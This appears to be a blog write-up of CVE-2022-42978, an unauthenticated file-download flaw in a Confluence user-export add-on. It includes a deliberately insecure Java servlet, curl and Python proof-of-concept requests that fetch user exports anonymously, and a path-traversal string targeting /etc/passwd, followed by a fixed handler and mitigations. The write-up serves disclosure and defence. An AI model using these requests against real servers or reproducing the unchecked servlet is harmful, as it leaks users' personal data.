Software security bugs are everywhere, but few are as surprising as those that let random users read files they shouldn’t be able to see. In this long read, I’ll walk you through CVE-2022-42978, a vulnerability in the Netic User Export add-on for Atlassian Confluence (before version 1.3.5).

This flaw makes it possible for anybody on the internet to download files directly from your server running Confluence, even if they don’t have an account. It’s a classic case of broken authorization. I’ll show you the details, share some proof-of-concept code, and explain how you can protect your systems.

What is Netic User Export?

Netic User Export is a plugin (add-on) for Atlassian Confluence, the popular team wiki tool. This add-on helps administrators export user data, making it easy to manage and review lists of users.

But before version 1.3.5, there was a big security mistake in how user export files were handled.

The Core Problem: Missing Authorization Checks

When a plugin lets you export user data or files, it should always check who is making the request. Only admins or authenticated users should be able to trigger an export or download these files.

In Netic User Export before 1.3.5, attackers discovered that the export endpoint didn't check whether the requester was logged in or held any special permission at all. This means an attacker could guess the endpoint's address and directly access sensitive exports—no login needed.

Pseudo-code Snippet

// Imaginary vulnerable code - simplified! The missing checks are left out on purpose.
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class UserExportServlet extends HttpServlet {           // imaginary class name
    private static final File EXPORT_PATH = new File("/var/confluence/exports"); // assumed location
    public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {
        String filename = request.getParameter("file");   // attacker-controlled
        File exportFile = new File(EXPORT_PATH, filename);

        // MISSING: Authentication and authorization checks here!

        response.setContentType("application/octet-stream");
        Files.copy(exportFile.toPath(), response.getOutputStream());
    }
}

Notice that there’s no check for user identity or permissions. Anyone can ask for any file available in the export folder.

Finding the Endpoint

Once installed, the Netic User Export plugin exposes a servlet endpoint on your Confluence server, for example:

https://confluence.example.com/plugins/servlet/user-export?file=export.csv

The Exploit

An attacker doesn’t need a username or password. If they know or can guess the filename (like export.csv), they can directly download it:

Bash PoC

curl "https://confluence.example.com/plugins/servlet/user-export?file=export.csv" -o exported_users.csv

They’ll get the full exported user list, which may contain usernames, emails, and more—ripe for spear phishing, spam, or more severe attacks.

Python PoC

import requests

# Endpoint as shown above (illustrative host name).
url = "https://confluence.example.com/plugins/servlet/user-export"
params = {"file": "export.csv"}

# No session cookie or credentials are sent: the request is fully anonymous.
with requests.get(url, params=params, timeout=10) as resp:
    if resp.status_code == 200:
        with open("leaked_export.csv", "wb") as f:
            f.write(resp.content)
        print("Exported data leaked!")
    else:
        print("Could not access the export file.")

Beyond the Demo

If the file parameter is not properly sanitized, attackers might also attempt path traversal (e.g., using ../../../../etc/passwd), but there is no public evidence this exploit goes that far in this plugin.
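As an added example (not the plugin's own code), here is the handler logic with the checks the vulnerable snippet omits: an authentication check, an admin-only authorization check, and containment of the file parameter inside the export directory, which also closes the path-traversal possibility just mentioned. The export directory and the User type are assumptions made for the example.

```python
from dataclasses import dataclass
from pathlib import Path
from typing import Optional, Tuple

# Assumed export location; the real plugin's directory is not documented here.
EXPORT_DIR = Path("/var/confluence/exports")


@dataclass
class User:
    """Minimal stand-in for the authenticated Confluence user (hypothetical type)."""
    name: str
    is_admin: bool


def resolve_export_file(export_dir: Path, requested: str) -> Optional[Path]:
    """Map the 'file' parameter to a path, or None if it escapes export_dir.

    Resolving first and then testing containment defeats '../' sequences,
    absolute paths, and look-alike siblings such as 'exports_backup'.
    """
    if not requested or "\x00" in requested:
        return None
    base = export_dir.resolve()
    candidate = (base / requested).resolve()
    if base not in candidate.parents:
        return None
    return candidate


def authorize_export(user: Optional[User], requested: str,
                     export_dir: Path = EXPORT_DIR) -> Tuple[int, Optional[Path]]:
    """The checks the vulnerable servlet omits. Returns (HTTP status, path)."""
    if user is None:
        return 401, None   # anonymous request: this is what CVE-2022-42978 let through
    if not user.is_admin:
        return 403, None   # authenticated but not an administrator
    target = resolve_export_file(export_dir, requested)
    if target is None:
        return 400, None   # traversal attempt or malformed file name
    return 200, target


if __name__ == "__main__":
    admin = User("alice", is_admin=True)
    for who, name in [(None, "export.csv"), (User("bob", False), "export.csv"),
                      (admin, "../../../../etc/passwd"), (admin, "export.csv")]:
        print(who.name if who else "anonymous", name, "->", authorize_export(who, name)[0])
```

Only the last case returns 200; the containment test uses the resolved path's parents rather than a string prefix, so a sibling directory with a shared name prefix is rejected too.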

References & More Reading

- NVD CVE Page for CVE-2022-42978
- Netic User Export Marketplace page
- Atlassian Confluence Security Advisories
- Path Traversal Attacks Explained (OWASP)

Mitigation and Fix

- Upgrade to Netic User Export version 1.3.5 or higher. The fixed version ensures proper checks for authentication and authorization, locking down the export endpoint.
- Remove the plugin until it's safe.
- Block access to /plugins/servlet/user-export using a web application firewall.

> Always keep plugins up to date, just like you do with your main application!

Final Thoughts

The lesson here is clear: Never trust plugin endpoints to “do the right thing” out of the box. Small mistakes in authorization checks can lead to big data leaks.

Review your add-ons, keep them updated, and always monitor for new CVEs. If you’re developing your own extensions for Confluence (or anything else!), remember to restrict sensitive actions to the right users.

If you want to stay on top of new security issues like this, follow the CVE database and your vendors’ security advisories—it’s worth the ten minutes a week.

Timeline

Published on: 11/15/2022 01:15:00 UTC
Last modified on: 11/17/2022 04:59:00 UTC